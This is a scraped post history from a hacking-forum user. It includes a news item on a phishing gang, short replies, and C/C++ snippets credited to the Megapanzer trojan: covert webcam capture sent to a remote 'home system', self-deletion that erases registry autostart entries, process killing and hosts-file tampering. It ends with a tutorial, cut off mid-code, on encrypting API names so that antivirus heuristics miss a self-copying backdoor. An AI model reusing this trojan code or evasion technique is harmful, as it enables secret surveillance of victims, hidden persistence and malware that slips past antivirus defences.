Nytro

Administrators | Posts: 18725 | Days Won: 706

Everything posted by Nytro

  1. Edit: CrackMe: http://rapidshare.com/files/208819072/Project1.exe
  2. If you type the password correctly, does it display "10"?
  3. The Romanian Police, together with D.I.I.C.O.T. (the Direction for Investigating Organized Crime and Terrorism), has executed an ample operation that has targeted hackers in the western part of the country. Between 15 and 20 persons have been arrested in the cities of Caransebeș, Lugoj, Timișoara, Hunedoara and Pitești under the suspicion of being members of a cybercriminal group. The gang is accused of executing phishing attacks and siphoning money from compromised accounts. According to local media, they cloned the websites of several banks in Spain and Italy, which they subsequently used to lure people into disclosing their financial information. The Italian Post Office seems to have been the group's main target. The fraudsters sent e-mails impersonating the institution, in which they claimed that customer data had been lost due to technical issues. A link included in the e-mail directed unsuspecting victims to a page masquerading as the Post Office's online payment system. Once on the page, users were asked to input their financial details, which were then stored on a server under the control of the Romanian phishers. The gang's M.O. involved "money mules" (people hired to pick up stolen funds) walking into post offices and letting them know via mobile phones that they were good to go. The Romanians then issued online money orders using the banking information of their victims. This allowed the mules to cash in the money and leave in a matter of minutes. Speed was vital to the whole scheme, as the system also sent SMS notifications of the transaction to the mobile phone number provided by the real account holder. In addition, in order to avoid arousing suspicion from the post office employees, the transactions only involved sums of under 1,000 euros. The compromised accounts were also being used to recharge mobile pre-paid SIM cards, heavily used for communication.
One of the arrested individuals, Flavius Brăgăilă, a 21-year-old man from Caransebeș, is suspected of being the head behind the whole operation. According to authorities, he had been coordinating the entire cybercriminal network, which was divided into independent cells operating from different Romanian and Italian cities. Ovidiu Andraș, son of the manager of the BCR (Romanian Commercial Bank) branch in Caransebeș, was also one of the individuals who were arrested. It was also noted that one of the detained persons was accused of hacking into several servers belonging to N.A.S.A. and various U.S. universities and using them to launch attacks that targeted banks. Details about this are still scarce, but it is possible that these servers have been used to host the fake cloned websites. Cosmin Bolosin, the attorney for four of the people detained in Caransebeș, commented for Caras Online that "[…] Even though people are speaking about those NASA servers, for the time being we haven't been presented with anything official in this respect. […] As far as the penal procedure is concerned, I can confirm that it has been fully respected and that the search warrants were legal. I was even a bit surprised." Meanwhile, the D.I.I.C.O.T. prosecutors pointed out that the network had been under surveillance for the past year. Source: http://news.softpedia.com/news/Romanian-Police-Takes-Down-Cybercriminal-Gang-106717.shtml
  4. Tg. Jiu competition

    I don't know anything about the results, I haven't received anything; my form teacher told me from unofficial sources that I might have taken first place. luyzette: Were you at the presentation? Or just at that thing in the amphitheatre when those guys talked and played 2 videos: Romania and Tg. Jiu?
  5. It doesn't get past anything anymore.
  6. I'm good at it... at handing out bans.
  7. Is your decryption algorithm still good?
  8. RS Mirror: http://rapidshare.com/files/207975537/CQKiller.rar
  9. C++ Snippets

B.o.t Killer by a59

This function searches through all running processes, except blacklisted ones, and then uses the ReadProcessMemory function to check for specified strings found in common bots. If any of the strings are found in the process's memory, the process is killed and the file deleted. Should be simple to modify for other types of unwanted programs.

```c
/* BotKiller Coded by a59 */
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>

void DoSearch( unsigned long uStartAddr, unsigned long uEndAddr, PROCESSENTRY32 pe32 );
void KillBot( PROCESSENTRY32 pe32 );

struct s_Search
{
    char* szBot;
    char* szString;
};

s_Search sSearch[ ] =
{
    { "VNC Scanning server", "\x52\x46\x42\x20\x30\x30\x33\x2E\x30\x30\x38\x0A" },
    { "RXBot", "[MAIN]" },
    { "RXBot", "[SCAN]" },
    { "RXBot", "[FTP]" },
    { "Unknown", "&echo bye" },
    { NULL, NULL }
};

void DoSearch( unsigned long uStartAddr, unsigned long uEndAddr, PROCESSENTRY32 pe32 )
{
    char szBigBuffer[ 0x5000 ] = { 0 };
    unsigned char Curbuf[ 0x500 ] = { 0 };
    HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID );

    printf( "Scanning PID: %d [ %s ]\nStart Address: 0x%08X End Address: 0x%08X\n\n",
            pe32.th32ProcessID, pe32.szExeFile, uStartAddr, uEndAddr );

    for( unsigned long uCurAddr = uStartAddr; uCurAddr <= uEndAddr; uCurAddr++ )
    {
        BOOL bRead = ReadProcessMemory( hProcess, (void *)uCurAddr, (void *)&Curbuf, sizeof( Curbuf ), NULL );
        if( bRead )
        {
            int c = 0;
            strcat( szBigBuffer, (char *)Curbuf );
            while( sSearch[ c ].szString != NULL )
            {
                if( strstr( szBigBuffer, sSearch[ c ].szString ) )
                {
                    printf( "Found string \"%s\" in \"%s\" server \"%s\"\n\n",
                            sSearch[ c ].szString, pe32.szExeFile, sSearch[ c ].szBot );
                    KillBot( pe32 );
                }
                c++;
            }
            if( sizeof( szBigBuffer ) > 0x150 )
                ZeroMemory( szBigBuffer, sizeof( szBigBuffer ) );
        }
        if( !bRead )
            break;
    }
    CloseHandle( hProcess );
};

void KillBot( PROCESSENTRY32 pe32 )
{
    MODULEENTRY32 me32 = { 0 };
    HANDLE hPath = CreateToolhelp32Snapshot( TH32CS_SNAPMODULE, pe32.th32ProcessID );
    HANDLE hKillProcess;

    me32.dwSize = sizeof( me32 );
    BOOL bRetval = Module32First( hPath, &me32 );
    while( bRetval )
    {
        if( !strcmp( pe32.szExeFile, me32.szModule ) )
        {
            SetFileAttributes( me32.szExePath, FILE_ATTRIBUTE_NORMAL );
            hKillProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID );
            TerminateProcess( hKillProcess, 0 );
            Sleep( 500 );
            if( DeleteFile( me32.szExePath ) )
                printf( "Terminated and deleted %s\n", me32.szExePath );
        }
        bRetval = Module32Next( hPath, &me32 );
    }
    CloseHandle( hKillProcess );
    CloseHandle( hPath );
};

int main( )
{
    char szFile[ 128 ];
    GetModuleFileName( GetModuleHandle( NULL ), szFile, sizeof( szFile ) );
    char* szBlockList[ ] = { "explorer.exe", "hidserv.exe", "WINLOGON.EXE", "SERVICES.EXE", szFile };
    HANDLE hProcess = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof( PROCESSENTRY32 );
    BOOL bRetval = Process32First( hProcess, &pe32 );
    bool bDoSearch = true;

    while( bRetval )
    {
        Sleep( 250 );
        for( int i = 0; i < ( sizeof( szBlockList ) / sizeof( char* ) ); i++ )
        {
            if( strstr( szBlockList[ i ], pe32.szExeFile ) )
                bDoSearch = false;
        }
        if( bDoSearch )
        {
            DoSearch( 0x00400000, 0x004FFFFF, pe32 );
            DoSearch( 0x00100000, 0x001FFFFF, pe32 );
        }
        else
            bDoSearch = true;

        bRetval = Process32Next( hProcess, &pe32 );
    }
    CloseHandle( hProcess );
    printf( "Done scanning, press ENTER to exit this program.\n" );
    getchar( );
    return 0;
};
```

Self Delete (Credit: carrumba)

```c
#include <windows.h>
#include <stdio.h>
#include <shlwapi.h>
#include <time.h>
#include "Megapanzer_Definitions.h"

extern char gRealRegistryName[MAX_BUF_SIZE + 1];

int selfDelete()
{
    WIN32_FIND_DATA lFileData;
    HANDLE lSearchHandle;
    char lFilePattern[MAX_BUF_SIZE + 1];
    char lTemp[MAX_BUF_SIZE + 1];
    char lTempDirectory[MAX_BUF_SIZE + 1];
    char lCWD[MAX_BUF_SIZE + 1];
    char lBatchFileNameFullPath[MAX_BUF_SIZE + 1];
    char lCommand[MAX_BUF_SIZE + 1];
    char lProgramName[MAX_BUF_SIZE + 1];
    HKEY lRegistryHeaps[] = {HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER, NULL};
    HKEY lKeyHandle;
    long lEnumRet = 0;
    DWORD lLength = 100;
    time_t lTimeStamp;
    int lRetVal = 0;
    int lFuncRetVal = 0;
    int lCounter = 0;
    int lCounter2 = 0;

    ////
    // initialization
    ////
    ZeroMemory(lProgramName, sizeof(lProgramName));
    ZeroMemory(lTemp, sizeof(lTemp));
    ZeroMemory(lTempDirectory, sizeof(lTempDirectory));
    ZeroMemory(lCWD, sizeof(lCWD));
    ZeroMemory(lBatchFileNameFullPath, sizeof(lBatchFileNameFullPath));
    ZeroMemory(&lTimeStamp, sizeof(lTimeStamp));
    GetModuleFileName(NULL, lProgramName, sizeof(lProgramName));
    time(&lTimeStamp);

    ////
    // create temporary directory
    ////
    if (GetTempPath(sizeof(lTempDirectory) - 1, lTempDirectory) > 0)
        if (lTempDirectory[strlen(lTempDirectory) - 1] != '\\')
            strcat(lTempDirectory, "\\");

    ////
    // generate batch file name
    ////
    GetCurrentDirectory(sizeof(lCWD) - 1, lCWD);
    if (lCWD[strlen(lCWD) - 1] != '\\')
        strcat(lCWD, "\\");
    _snprintf(lBatchFileNameFullPath, sizeof(lBatchFileNameFullPath) - 1, "%s%d.bat", lTempDirectory, lTimeStamp);
    printToFile(lBatchFileNameFullPath, "@echo off");
    printToFile(lBatchFileNameFullPath, ":Repeat");
    ZeroMemory(lCommand, sizeof(lCommand));
    _snprintf(lCommand, sizeof(lCommand) - 1, "@del /F \"%s\"", lProgramName);
    printToFile(lBatchFileNameFullPath, lCommand);
    ZeroMemory(lCommand, sizeof(lCommand));
    _snprintf(lCommand, sizeof(lCommand) - 1, "if exist \"%s\" goto Repeat", lProgramName);
    printToFile(lBatchFileNameFullPath, lCommand);

    ////
    // generate delete entry for registry keys/values
    ////
    for (lCounter = 0; lRegistryHeaps[lCounter] != NULL; lCounter++)
    {
        if (RegOpenKeyEx(lRegistryHeaps[lCounter], "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_READ, &lKeyHandle) == ERROR_SUCCESS)
        {
            lCounter2 = 0;
            ZeroMemory(lTemp, sizeof(lTemp));
            lLength = sizeof(lTemp) - 1;
            while ((lEnumRet = RegEnumValue(lKeyHandle, lCounter2, lTemp, &lLength, NULL, NULL, NULL, NULL)) == ERROR_SUCCESS)
            {
                if (StrCmpNI(gRealRegistryName, lTemp, sizeof(gRealRegistryName)) == 0)
                {
                    ZeroMemory(lCommand, sizeof(lCommand));
                    if (lRegistryHeaps[lCounter] == CURRENT_USER)
                    {
                        _snprintf(lCommand, sizeof(lCommand) - 1, "@reg delete HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\ /v %s /f", lTemp);
                        printToFile(lBatchFileNameFullPath, lCommand);
                    }
                    else if (lRegistryHeaps[lCounter] == LOCAL_MACHINE)
                    {
                        _snprintf(lCommand, sizeof(lCommand) - 1, "@reg delete HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\ /v %s /f", lTemp);
                        printToFile(lBatchFileNameFullPath, lCommand);
                    } // if (lRegistryHeaps[lCou...
                } // if (StrCmpNI(gRealRegistryName, lTemp...
                lLength = sizeof(lTemp) - 1;
                lCounter2++;
                ZeroMemory(lTemp, sizeof(lTemp));
            } // while((lEnumRet = RegEnumValue(lKeyH...
            RegCloseKey(lKeyHandle);
        } // if (RegOpenKeyEx(lReg...
    } // for(lCounter = 0; lRegistryHeaps[lCoun...

    ////
    // delete Mega Panzer files
    ////
    ZeroMemory(lCommand, sizeof(lCommand));
    _snprintf(lCommand, sizeof(lCommand) - 1, "@del /F \"%s\" || move /Y \"%s\" \"%s\"", lBatchFileNameFullPath, lBatchFileNameFullPath, lTempDirectory);
    printToFile(lBatchFileNameFullPath, lCommand);

    ////
    // run batch script
    ////
    ShellExecute(NULL, NULL, lBatchFileNameFullPath, NULL, "c:\\", SW_HIDE);
    exit(lRetVal);
}

int printToFile(char *pOutputFileName, char* pCommandString)
{
    int lRetVal = 0;
    HANDLE lFileHandle = INVALID_HANDLE_VALUE;
    DWORD lBytesWritten = 0;
    char lTemp[MAX_BUF_SIZE + 1];

    if ((lFileHandle = CreateFile(pOutputFileName, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE)
    {
        SetFilePointer(lFileHandle, 0, 0, FILE_END);
        ZeroMemory(lTemp, sizeof(lTemp));
        snprintf(lTemp, sizeof(lTemp) - 1, "%s\r\n", pCommandString);
        WriteFile(lFileHandle, lTemp, strlen(lTemp), &lBytesWritten, NULL);
        CloseHandle(lFileHandle);
    }
    return(lRetVal);
}
```

WebCam Capture (Credit: carrumba)

```c
#include <stdio.h>
#include <windows.h>
#include <Vfw.h>
#include "Megapanzer_Definitions.h"

extern HWND gWND;

DWORD WINAPI sendWebcamCaptureInfos(PVOID pParameter)
{
    HWND lWndVideoHandle;
    CAPSTATUS lCapStat;
    DWORD lRetVal = 0;
    char *lBMPFileName = "info.bmp";
    char *lJPGFileName = "info.jpg";
    char lJPGFileBaseName[MAX_BUF_SIZE + 1];
    HANDLE lFileHandle = INVALID_HANDLE_VALUE;
    DWORD lJPGFileSize = 0;
    char *lPreEncodedData = NULL;
    char *lEncodedData = NULL;
    DWORD lBytesRead = 0;
    char lTemp[MAX_BUF_SIZE + 1];
    int lFuncRetVal = 0;
    PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter;
    SYSTEMTIME lSystemTime;

    /*
     * initialize values
     */
    ZeroMemory(&lCapStat, sizeof(CAPSTATUS));
    ZeroMemory(&lSystemTime, sizeof(lSystemTime));
    ZeroMemory(lJPGFileBaseName, sizeof(lJPGFileBaseName));
    GetLocalTime(&lSystemTime);
    snprintf(lJPGFileBaseName, sizeof(lJPGFileBaseName) - 1, "%04d-%02d-%02d-%02d-%02d-%02d.jpg",
             lSystemTime.wYear, lSystemTime.wMonth, lSystemTime.wDay,
             lSystemTime.wHour, lSystemTime.wMinute, lSystemTime.wSecond);
    ZeroMemory(lTemp, sizeof(lTemp));
    _snprintf(lTemp, sizeof(lTemp) - 1, "<webcam>");
    lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0);

    /*
     * capture webcam frame
     */
    Sleep(500);
    lWndVideoHandle = capCreateCaptureWindow("WebCam", WS_CHILD, 0, 0, 320, 240, (HWND) gWND, (int) 1);
    capDriverConnect(lWndVideoHandle, 0);
    Sleep(1000);
    capGetStatus(lWndVideoHandle, &lCapStat, sizeof(CAPSTATUS));
    capGrabFrame(lWndVideoHandle);
    capEditCopy(lWndVideoHandle);
    capFileSaveDIB(lWndVideoHandle, lBMPFileName);
    capDriverDisconnect(lWndVideoHandle);
    DestroyWindow(lWndVideoHandle);
    convertBMP2JPG(lBMPFileName, lJPGFileName);

    if ((lFileHandle = CreateFileA(lJPGFileName, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE)
    {
        lJPGFileSize = GetFileSize(lFileHandle, 0);

        /*
         * encode created jpg file
         */
        if ((lPreEncodedData = (char *) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, lJPGFileSize * 2)) != NULL)
        {
            ReadFile(lFileHandle, lPreEncodedData, lJPGFileSize, (unsigned long *) &lBytesRead, NULL);
            CloseHandle(lFileHandle);
            if ((lEncodedData = (char *) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, lJPGFileSize * 2)) != NULL)
            {
                /*
                 * transfer picture data to home system
                 */
                Base64encode(lEncodedData, lPreEncodedData, lBytesRead);
                ZeroMemory(lTemp, sizeof(lTemp));
                _snprintf(lTemp, sizeof(lTemp) - 1, "<filename>%s</filename><filecontent>", lJPGFileBaseName);
                lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0);
                lFuncRetVal = send(lCommandStructure->lRemoteSocket, lEncodedData, Base64encode_len(lBytesRead) - 1, 0);
                ZeroMemory(lTemp, sizeof(lTemp));
                _snprintf(lTemp, sizeof(lTemp) - 1, "</filecontent>");
                lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0);
            } // if ((lEncodedData = (char *) He...
        } // if ((lPreEncodedData = (char *) HeapAlloc(GetP...
    } // if ((lFileHandle = CreateFileA(lJPGFileFullPath,...

    ZeroMemory(lTemp, sizeof(lTemp));
    _snprintf(lTemp, sizeof(lTemp) - 1, "</webcam>");
    lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0);

    /*
     * cleaning up before returning
     */
    DeleteFile("info.bmp");
    DeleteFile("info.jpg");
    return(lRetVal);
}
```

Kill Process by PID (Credit: carrumba)

```c
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include "Megapanzer_Definitions.h"

DWORD WINAPI killProcessByPID(PVOID pParameter)
{
    int lRetVal = 0;
    HANDLE lProcessHandle = INVALID_HANDLE_VALUE;
    char lTemp[MAX_BUF_SIZE + 1];
    char lProcessName[MAX_BUF_SIZE + 1];
    int lFuncRetVal = 0;
    PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter;
    HMODULE lModuleHandle;
    DWORD cbNeeded;

    ZeroMemory(lProcessName, sizeof(lProcessName));
    strcpy(lProcessName, "Unknown");
    ZeroMemory(lTemp, sizeof(lTemp));
    _snprintf(lTemp, sizeof(lTemp) - 1, "<killprocess><msg>Could not kill process \"%s\"</msg></killprocess>", lCommandStructure->sCommandString);

    if ((lProcessHandle = OpenProcess(PROCESS_TERMINATE, FALSE, atoi(lCommandStructure->sCommandString))) != INVALID_HANDLE_VALUE)
    {
        if (EnumProcessModules(lProcessHandle, &lModuleHandle, sizeof(lModuleHandle), &cbNeeded))
            GetModuleBaseName(lProcessHandle, lModuleHandle, lProcessName, sizeof(lProcessName) - 1);
        if (TerminateProcess(lProcessHandle, (DWORD) -1))
        {
            ZeroMemory(lTemp, sizeof(lTemp));
            _snprintf(lTemp, sizeof(lTemp) - 1, "<killprocess><msg>Killed process \"%s\" (pid %s) successfully</msg></killprocess>", lProcessName, lCommandStructure->sCommandString);
        }
        CloseHandle(lProcessHandle);
    }
    lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0);
    return(lRetVal);
}
```

Kill Process by Name (Credit: carrumba)

```c
#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>
#include "Megapanzer_Definitions.h"

DWORD WINAPI killProcessByName(PVOID pParameter)
{
    int lRetVal = 0;
    int lFuncRetVal = 0;
    char lTemp[MAX_BUF_SIZE + 1];
    PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter;
    HANDLE hProcessSnap;
    HANDLE hProcess;
    PROCESSENTRY32 pe32;
    DWORD dwPriorityClass;

    if (lCommandStructure->sCommandString != NULL)
    {
        if ((hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE)
        {
            lRetVal = 1;
            goto END;
        }
        pe32.dwSize = sizeof(PROCESSENTRY32);
        if (!Process32First(hProcessSnap, &pe32))
        {
            lRetVal = 2;
            goto END;
        }
        do
        {
            if (!strcmp(pe32.szExeFile, lCommandStructure->sCommandString))
            {
                hProcess = OpenProcess(PROCESS_TERMINATE, 0, pe32.th32ProcessID);
                TerminateProcess(hProcess, 0);
                CloseHandle(hProcess);
            }
        } while (Process32Next(hProcessSnap, &pe32));
    }
END:
    if (hProcessSnap != INVALID_HANDLE_VALUE)
        CloseHandle(hProcessSnap);
    return(lRetVal);
}
```

Modify hosts file (Credit: carrumba)

```c
#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>
#include "Megapanzer_Definitions.h"

DWORD WINAPI addHostsEntry(PVOID pParameter)
{
    int lRetVal = 0;
    int lFuncRetVal = 0;
    char lTemp[MAX_BUF_SIZE + 1];
    char lTemp2[MAX_BUF_SIZE + 1];
    char *lTempPointer = NULL;
    DWORD dwWritten = 0;
    HANDLE lFileHandle = INVALID_HANDLE_VALUE;
    PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter;

    if (lCommandStructure->sCommandString != NULL)
    {
        ZeroMemory(lTemp, sizeof(lTemp));
        snprintf(lTemp, sizeof(lTemp) - 1, "\r\n%s", lCommandStructure->sCommandString);
        if ((lFileHandle = CreateFile(HOSTS_FILE, FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE)
        {
            SetFilePointer(lFileHandle, 0, 0, FILE_END);
            WriteFile(lFileHandle, lTemp, strlen(lTemp), &dwWritten, NULL);
            CloseHandle(lFileHandle);
        }
    }
    return(lRetVal);
}

DWORD WINAPI removeHostsEntry(PVOID pParameter)
{
    int lRetVal = 1;
    int lFuncRetVal = 0;
    char lTemp[MAX_BUF_SIZE + 1];
    char lReadBuffer[MAX_BUF_SIZE + 1];
    PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter;
    FILE *lFileOldHostsHandle = NULL;
    FILE *lFileNewHostsHandle = NULL;

    if (lCommandStructure != NULL && lCommandStructure->sCommandString != NULL)
    {
        if ((lFileOldHostsHandle = fopen(HOSTS_FILE, "r")) != NULL)
        {
            ZeroMemory(lTemp, sizeof(lTemp));
            snprintf(lTemp, sizeof(lTemp) - 1, "%s.tmp", HOSTS_FILE);
            if ((lFileNewHostsHandle = fopen(lTemp, "w")) != NULL)
            {
                while (!feof(lFileOldHostsHandle))
                {
                    ZeroMemory(lReadBuffer, sizeof(lReadBuffer));
                    if (fgets(lReadBuffer, sizeof(lReadBuffer) - 1, lFileOldHostsHandle) > 0)
                    {
                        if (strstr(lReadBuffer, lCommandStructure->sCommandString) == NULL)
                            fprintf(lFileNewHostsHandle, lReadBuffer);
                        else
                            lRetVal = 0;
                    }
                }
                fclose(lFileNewHostsHandle);
            }
            fclose(lFileOldHostsHandle);
        }
    }
END:
    if (lRetVal == 0)
    {
        ZeroMemory(lTemp, sizeof(lTemp));
        snprintf(lTemp, sizeof(lTemp) - 1, "%s.tmp", HOSTS_FILE);
        DeleteFile(HOSTS_FILE);
        MoveFile(lTemp, HOSTS_FILE);
    }
    return(lRetVal);
}
```

Very simple pass gen

```cpp
/*
More simple pass generator; inspired by carb0n passgen code on this forum
Lamecoded by : x.exexe_ // from newbie to newbies
*/
#include <iostream>
#include <string>
#include <cstdlib>
#include <ctime>
#include <fstream>

void RndPass(int len, std::string &pesw)
{
    // table with chars, can re-define
    char c_table[] = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
                      'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
                      'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
                      'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9'};
    // the table has no terminating NUL, so its size must come from sizeof(), not strlen()
    const int table_size = sizeof(c_table) / sizeof(c_table[0]);

    // rand() seeded with the clock is fine for a demo, but it is not a
    // cryptographic generator; do not use this for passwords you rely on
    srand(time(NULL));
    for(; len > 0; len--)                      // save random number (as char)
        pesw += c_table[ rand() % table_size ]; // to pesw string
}

int main()
{
    int len;
    std::string passwd = "";
    std::cout << "\t\tSimply pesvrd gen by x.exexe_\n" << std::endl;
    std::cout << "Enter password length (number): ";
    std::cin >> len;
    RndPass(len, passwd);
    std::cout << "Ur pass is : \n" << passwd << std::endl;
    std::cout << "Make internet better!" << std::endl;

    // create file stream with append mode
    std::ofstream PassFileStream("piss.txt", std::ios::app);
    if ( PassFileStream.is_open() )            // if stream open is ok ...
        PassFileStream << passwd << "\n\n";    // ... write pass to file
    PassFileStream.close();                    // close stream

    std::cin.get();                            // hit any key
    return 0;
}
```
  10. # Title: API crypting (or: how to outwit the heuristic method of antivirus software)
# Date: 03.03.2008
# Author: Eddy14
# Website: www.eddys-blog.6x.to
# Email: eddy14@pen.tj
# Contents:
# 0x1 - Preface
# 0x2 - Introduction
# 0x3 - API commands
# 0x4 - The source code (and explanation)
# 0x5 - Deeper insight (Reverse Engineering)
# 0x6 - Conclusion / Links

0x1 - Preface

Hello and welcome to my API crypting tutorial :) I wanted to have this paper finished 2.5 months ago, but somehow my Dev-C++ went on strike and otherwise I had no particular desire :P Enough babbling, first I'll tell you what background you should bring to this tutorial:
- Good knowledge of C (pointers, typecasting, etc.)
- Skills in Windows programming (the WinAPI!)
- You should have worked with DLLs before (important, otherwise the DLL-like code will confuse you)
- You should have encrypted strings before (Caesar encryption is sufficient)

On to the introduction :)

0x2 - Introduction

Well, first: why am I writing this tutorial? First, because I have written too few tutorials, and second, because I had just been writing a remote shell for Windows (a little backdoor; btw, I will also write a tutorial on the remote shell, and on pipes under Windows in general), and together with born2die I found that the antivirus software detected my backdoor, which was inexplicable to me, because it was self-written software that no signature should have matched! It was the stinkin' heuristic!
In my program something like this was implemented:

```c
GetWindowsDirectory(&buffer, sizeof(buffer));
CopyFile(argv[0], buffer, FALSE);
```

(with a strcat in between to append the file name)

Which told Windows roughly: "Find out your Windows directory and then copy me there!"

To Antivir it looked like: "Buuuh, I'm eeeevil and a virus! I'm now going to copy myself into the Windows directory, totally leet!"

Which to me said roughly: "Suck my balls!"

Well, joking aside. It didn't take me long to realize that the antivirus recognized the GetWindowsDirectory in the program, followed by CopyFile, as malware (I don't know of any other software that makes sensible use of something like that, or do you?). In any case the antivirus program detects my calls to this API, but not if they don't exist in the compiled state and only appear at run time, i.e. dynamically! You ask how to do this? Quite simply: we don't call GetWindowsDirectory directly (so that our program doesn't import it directly, and the AV thus knows nothing about it), but only at run time! It's very simple. You should take a look at the PE (Portable Executable) format. At some point you will come across the IAT (Import Address Table). This table contains the addresses of the imported functions (from foreign DLLs). Based on this table one can understand which API functions the program uses. Functions can also appear in this table only during run time (used, for example, if a DLL is loaded at run time). That is what I mean by "dynamic". (More on the IAT can be found here: http://sandsprite.com/CodeStuff/Understanding_imports.html) You're still asking how it works?
Then first read the chapter "API commands", and in the "source code" part I will explain everything exactly :)

0x3 - API commands

First, the three "commands" we will try to use:
- GetWindowsDirectory (GetWindowsDirectoryA)
- CopyFile
- MessageBox (MessageBoxA)

And the two major commands without which API crypting would probably not be possible:
- LoadLibrary
- GetProcAddress

0x4 - The source code

Since you now know which API calls we need, you can hopefully already think of what comes next. Or still not? Well, I'll reveal the whole secret: we will encrypt our functions as strings, and then load and call them via LoadLibrary and GetProcAddress. So in the compiled state the executable file contains no information about e.g. GetWindowsDirectory, only about LoadLibrary and GetProcAddress. If these two functions don't mean anything to you, please read through my requirements again, because it says there: you should have loaded a DLL before! Well, the secret is revealed! Of course it's not yet clear how the whole thing works. I will now present code and, as always, explain it :) BTW, I'm using raw GCC under Windows here, Dev-C++ sucked, that's why.

```c
#include <stdio.h>
#include <windows.h>

int crypt(char *str);

int main(int argc, char *argv[])
{
    char hello[] = "Hello World";
    crypt(hello);
    printf("%s\n", hello);
    system("PAUSE");
    return 0;
}
```

Here you can see in advance what our test program will do. There is a so-called "crypt" function, which our test string goes through, and then it is printed (+ waits for further input).
Everybody should have understood that, because in principle this is just about the "crypt" function, which I'll show now:

```c
int crypt(char *str)
{
    int length;
    char chr;
    int ord;

    for (length = 0; length < strlen(str); length++)
    {
        ord = (int) str[length];
        ord = ord + 1;
        chr = (char) ord;
        str[length] = chr;
    }
    return 0;
}
```

Looks bad, doesn't it? Or not at all? Our loop goes through all the characters. On each pass, the current character is read. That is now its ASCII value [=> see "(int) str[length]"]. The ASCII value of "H" is 72. Then 1 is added to this value, giving 73. Now the ASCII character for 73 is stored back in "chr". What happened here is simple: it was encrypted! A character was shifted one position further along the alphabet! So an "I" should come out, and it does! This continues with every other character. Even with characters that are not in the alphabet, because this is about the ASCII table! Thus a space becomes an exclamation mark, because the space is number 32 in the ASCII table and the following 33 is the exclamation point :) Now think briefly about the decrypt method. Well, what would it look like? Right, exactly the same, only with 1 subtracted instead of added.

```c
int decrypt(char *str)
{
    int length;
    char chr;
    int ord;

    for (length = 0; length < strlen(str); length++)
    {
        ord = (int) str[length];
        ord = ord - 1;
        chr = (char) ord;
        str[length] = chr;
    }
    return 0;
}
```

Our encryption method is ready. You can encrypt strings however you want, the main thing is that you can decrypt them again.
We now test our program:

```c
#include <stdio.h>
#include <string.h>
#include <windows.h>

int crypt(char *str);
int decrypt(char *str);

int main(int argc, char *argv[])
{
    char hello[] = "Hello World";
    crypt(hello);
    printf("%s\n", hello);
    system("PAUSE");
    return 0;
}

int crypt(char *str)
{
    int length;
    char chr;
    int ord;

    for (length = 0; length < strlen(str); length++)
    {
        ord = (int) str[length];
        ord = ord + 1;
        chr = (char) ord;
        str[length] = chr;
    }
    return 0;
}

int decrypt(char *str)
{
    int length;
    char chr;
    int ord;

    for (length = 0; length < strlen(str); length++)
    {
        ord = (int) str[length];
        ord = ord - 1;
        chr = (char) ord;
        str[length] = chr;
    }
    return 0;
}
```

For the readers who use GCC (who probably already know how to compile :P):

```
gcc cryptme.c -o cryptme.exe
```

Start it and what do you see? It prints ...

```
Ifmmp!Xpsme
Press any key . . .
```

So our "Hello World" encrypted (using our algorithm) is "Ifmmp!Xpsme". OK good. Now everything runs. If you really want to, you can also test the decrypt function :) We'll now make another attempt: replace the "Hello World" above with "MessageBoxA". It tells us:

```
NfttbhfCpyB
Press any key . . .
```

As you probably suspected, we will encrypt MessageBox for our attempts. Perhaps you ask why we encrypt MessageBoxA and not MessageBox? To be exact, there is no MessageBox. Windows generally has every (?) function that works with strings in 2 versions. One that ends with A and one that ends with W. Those with an A are the ASCII versions, and those with W (for Wide Char) the Unicode version. Depending on the compiler setting, one of them is selected. So you can either adjust the settings, or use the versions directly (so "MessageBoxA" instead of "MessageBox" in the code example).
OK, back on topic (a little English is a must ;)). If you have worked with DLLs before (if not, I urge you once again to do so!) then you probably know the two functions LoadLibrary and GetProcAddress. We will now use these for our encrypted functions! Let's go!

```c
typedef int (WINAPI *MessageBoxA_t)(HWND, LPCSTR, LPCSTR, UINT);

int main(int argc, char *argv[])
{
    char func_crypted[] = "NfttbhfCpyB";
    HMODULE dll;
    MessageBoxA_t MyMessageBox;

    decrypt(func_crypted);
